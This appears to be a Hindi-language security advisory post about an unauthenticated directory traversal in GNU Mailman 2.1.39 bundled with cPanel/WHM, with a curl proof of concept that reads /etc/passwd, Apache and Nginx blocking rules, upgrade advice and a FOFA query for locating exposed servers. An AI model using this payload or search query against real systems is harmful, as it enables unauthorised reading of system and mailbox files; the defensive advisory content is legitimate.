
GNU Mailman 2.1.39 में एक नई भेद्यता खोजी गई है, जो cPanel/WHM के साथ बंडल किया गया है, जो बिना प्रमाणीकरण के दूरस्थ हमलावरों को डायरेक्टरी ट्रैवर्सल दोष के माध्यम से सर्वर पर मनमानी फ़ाइलें पढ़ने की अनुमति देती है।
GNU Mailman 2.1.39 में एक नई भेद्यता खोजी गई है, जो cPanel/WHM के साथ बंडल होता है, जो बिना प्रमाणीकरण वाले रिमोट हमलावरों को डायरेक्टरी ट्रैवर्सल दोष के माध्यम से सर्वर पर मनमानी फाइलें पढ़ने की अनुमति देता है।
📌 भेद्यता सारांश:
Directory Traversal (बिना प्रमाणीकरण)private.py CGI स्क्रिप्ट/mailman/private/mailman/etc/passwd, .mbox अभिलेख, और Mailman कॉन्फ़िग जैसी फाइलों का खुलासा5.8 (Medium)CVE-2025-43919स्थिति: कोई आधिकारिक पैच नहीं (Mailman 2.1.x EOL है)
🔥 प्रूफ ऑफ कॉन्सेप्ट:
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
🧨 शोषण परिदृश्य:
/etc/passwd, configs, या mailbox files डंप करें🛡️ शमन उपाय:
वेब सर्वर स्तर पर /mailman/private तक पहुंच ब्लॉक करें:
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
या Nginx में:
location /mailman/private {
deny all;
return 403;
}
⬆️ Mailman 3.x — 2.x पर माइग्रेट करें — यह EOL है और आधुनिक सुरक्षा उपायों से रहित है
🔍 FOFA क्वेरी : app="Mailman"
📚 और सीखें, जिम्मेदारी से साझा करें, और अपने इंफ्रास्ट्रक्चर को सुरक्षित रखें।
🔒 अधिक वास्तविक दुनिया CVEs, PoCs, और hardening टिप्स के लिए फॉलो करें: 👉 @cybersecplayground
#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity